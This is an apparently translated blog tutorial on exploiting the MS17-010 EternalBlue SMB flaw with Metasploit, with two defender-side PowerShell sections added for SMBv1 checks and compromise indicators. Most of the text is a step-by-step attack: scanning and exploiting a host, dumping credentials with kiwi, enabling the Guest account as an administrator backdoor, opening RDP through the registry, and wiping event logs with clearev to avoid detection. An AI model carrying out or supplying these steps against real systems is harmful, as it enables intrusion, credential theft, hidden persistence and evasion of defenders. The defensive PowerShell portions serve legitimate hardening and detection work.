Ms17-010 Eternal Blue vulnerability of MSF
2022-06-30 22:42:00 【AI_ SumSky】
**Main idea of the article:**
1. Get familiar with the basic usage of msf.
2. Get familiar with some basic Windows commands.
3. Reproduce the EternalBlue vulnerability.
Vulnerability principle:
A crafted request sent to the SMBv1 service of a Windows server triggers a buffer overflow, which ultimately leads to the execution of arbitrary commands. On Windows the SMB service is enabled by default and listens on port 445, so the impact of this vulnerability is very large.
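As an added defender-side example (not part of the original post), the following PowerShell checks whether a Windows host still offers the attack surface described above, the SMBv1 service listening on port 445, and disables it. It assumes Windows 8 / Server 2012 or later, where the `SmbShare` and `NetTCPIP` cmdlets exist, and an elevated session; the `Disable-WindowsOptionalFeature` step is the Windows 10 client form (on Server the feature is `FS-SMB1`, removed with `Remove-WindowsFeature`).

```powershell
# Added example, not from the original post: report whether this host exposes
# SMBv1 on port 445, the surface MS17-010 abuses, and turn SMBv1 off.
# Assumes Windows 8 / Server 2012 or later and an elevated PowerShell session.
function Get-Smb1Exposure {
    $cfg = Get-SmbServerConfiguration
    # Is anything bound to TCP 445 in LISTEN state? (same information as netstat -ano)
    $listening = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Smb1Enabled   = $cfg.EnableSMB1Protocol
        Port445Listen = [bool]$listening
        # Both true means SMBv1 is reachable exactly as the vulnerability requires.
        Exposed       = ($cfg.EnableSMB1Protocol -and [bool]$listening)
    }
}

function Disable-Smb1 {
    # Server side: stop offering the SMBv1 dialect to clients (no confirmation prompt).
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Windows 10 client form: remove the optional feature so the SMBv1 driver is gone too.
    # On Windows Server use: Remove-WindowsFeature FS-SMB1
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
}

$state = Get-Smb1Exposure
$state | Format-List
if ($state.Exposed) {
    Write-Warning "SMBv1 is enabled and TCP 445 is listening; disabling SMBv1."
    Disable-Smb1
}
```

Disabling SMBv1 removes the vulnerable protocol entirely, which protects even hosts that cannot take the patch; port 445 will still listen for SMBv2/3, so the `Port445Listen` field alone is not a finding.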
**Common MSF commands:**
- `show exploits`: display the available exploit modules.
- `search`: search for exploit modules; fuzzy matching is supported.
- `use`: select an exploit module, by the name obtained from `show` or `search`.
- `show payloads`: display the payloads available for the current module.
- `show options`: after a module is selected, display the parameters that must be set for it.
- `set`: set an option, for example an option of the exploit module; the payload is also chosen with `set`.
- `exploit` / `run`: once all parameters are set, launch the attack.
**Exploit process:**
1. Start MSF; it integrates the MS17-010 vulnerability test module by default. Use `search ms17-010` to find it.
2. Check whether the host is vulnerable: use `use` to select the third module in the list, the scanner that detects whether the host has the EternalBlue vulnerability. `show options` lists the parameters to configure; the target host RHOSTS is not set, so it must be set.
   Set RHOSTS to the IP of the target host (it can also be a network segment) and start with `run`. The result is shown in the figure and indicates that the vulnerability exists.
3. Once the vulnerability is confirmed, move on to the payload attack: enter `use 0` to open the exploit module, which prompts for its parameters; `show options` shows which ones must be configured.
   First set the target host RHOSTS, then the payload type (it defaults to a 64-bit target; for a 32-bit target the corresponding script must be downloaded and imported, after which the X64 setting is removed), and finally the local port on this machine to connect back to.
   With the parameters set, launch the script with `run` or `exploit`; a `meterpreter` prompt means the exploit succeeded.
After a successful exploit, we can do the following:
1. Use the `screenshot` command to capture the screen of the vulnerable machine.
   The captured result looks like this:
2. Use `upload` and `download` to transfer files to and from the machine.
3. Use `load kiwi` to recover the passwords of the host's active accounts, and `creds_all` to view them.

4. The `shell` command drops into an administrator command line on the vulnerable machine. If the command line output is garbled, `chcp 65001` switches the code page to UTF-8 and `chcp 936` switches it to GBK.
For convenience, or for further operations, you can log in to the host through the remote desktop port, but first we need a usable account. The Guest account is used here because it is the system's built-in guest account; logging in with another account is more likely to arouse suspicion.
Activate the Guest account. You could also create a new account, but new accounts are easy to notice.
```cmd
:: Activate the Guest account
net user Guest /active:yes
:: Add the activated Guest user to the local Administrators group
net localgroup Administrators Guest /add
:: Change the user's password
net user Guest 123
```
After the account setup, remote login is needed, so open port 3389, the remote desktop port.
```cmd
:: Enable port 3389 (allow Remote Desktop connections)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
:: Disable port 3389 again: change 00000000 to 11111111
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
```
Open another terminal and connect to the vulnerable machine with the `rdesktop` command.
Enter the password set earlier to log in to the vulnerable machine.
5. To avoid being caught, finally use `clearev` to clear traces; it clears the System, Security and Application event logs.
The result looks like this:
Command: on the vulnerable machine, `netstat -ano` shows the port connection status, which is what the defender will later check for traces of the attack.
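As an added defender-side example (not part of the original post), the following PowerShell audits a host for the specific traces the walkthrough above leaves behind: the Guest account re-enabled and placed in Administrators, `fDenyTSConnections` set to 0, live sessions on ports 445 and 3389 (the `Get-NetTCPConnection` equivalent of `netstat -ano`), and event logs that have been cleared. It assumes Windows 10 / Server 2016 or later with the `LocalAccounts` and `NetTCPIP` modules, an administrator session, and an English group name `Administrators` (localized systems need the local name); event IDs 1102 (Security log cleared) and 104 (System or Application log cleared, recorded in the System log) are the standard Windows audit events for log clearing.

```powershell
# Added example, not from the original post: look for the traces left by the steps
# described above. Run as an administrator on the suspect host.
# Assumes Windows 10 / Server 2016+ and the English group name "Administrators".
function Get-PostExploitIndicators {
    $findings = @()

    # 1. Guest account re-enabled (net user Guest /active:yes)
    $guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
    if ($guest -and $guest.Enabled) { $findings += 'Guest account is enabled' }

    # 2. Guest placed in the local Administrators group (net localgroup ... /add)
    $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
    if ($admins | Where-Object { $_.Name -like '*\Guest' }) {
        $findings += 'Guest is a member of Administrators'
    }

    # 3. Remote Desktop opened through the registry (fDenyTSConnections = 0)
    $ts = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
                           -Name fDenyTSConnections -ErrorAction SilentlyContinue
    if ($ts -and $ts.fDenyTSConnections -eq 0) {
        $findings += 'Remote Desktop is enabled (fDenyTSConnections=0)'
    }

    # 4. Established sessions on SMB (445) and RDP (3389), with the owning process,
    #    the same view netstat -ano gives
    $conns = Get-NetTCPConnection -LocalPort 445,3389 -State Established -ErrorAction SilentlyContinue
    foreach ($c in $conns) {
        $proc = (Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        $findings += "Established port $($c.LocalPort) session from $($c.RemoteAddress) (PID $($c.OwningProcess) $proc)"
    }

    # 5. Event logs wiped (clearev): clearing the Security log is audited as event 1102
    #    in the Security log; clearing the System or Application log writes event 104
    #    to the System log. These survive unless the logs are cleared again afterwards.
    $cleared = @(Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102} -MaxEvents 5 -ErrorAction SilentlyContinue) +
               @(Get-WinEvent -FilterHashtable @{LogName='System';   Id=104}  -MaxEvents 5 -ErrorAction SilentlyContinue)
    foreach ($e in $cleared) {
        $findings += "Event log cleared at $($e.TimeCreated) ($($e.LogName) event $($e.Id))"
    }

    return $findings
}

$result = @(Get-PostExploitIndicators)
if ($result.Count -eq 0) { 'No indicators found' } else { $result }
```

The log-cleared events are the useful part against `clearev`: an attacker who wipes the logs removes the earlier entries but the clear itself is recorded, so a 1102 or 104 event with no preceding history is a strong signal, and forwarding the logs to a collector before they can be cleared preserves the rest.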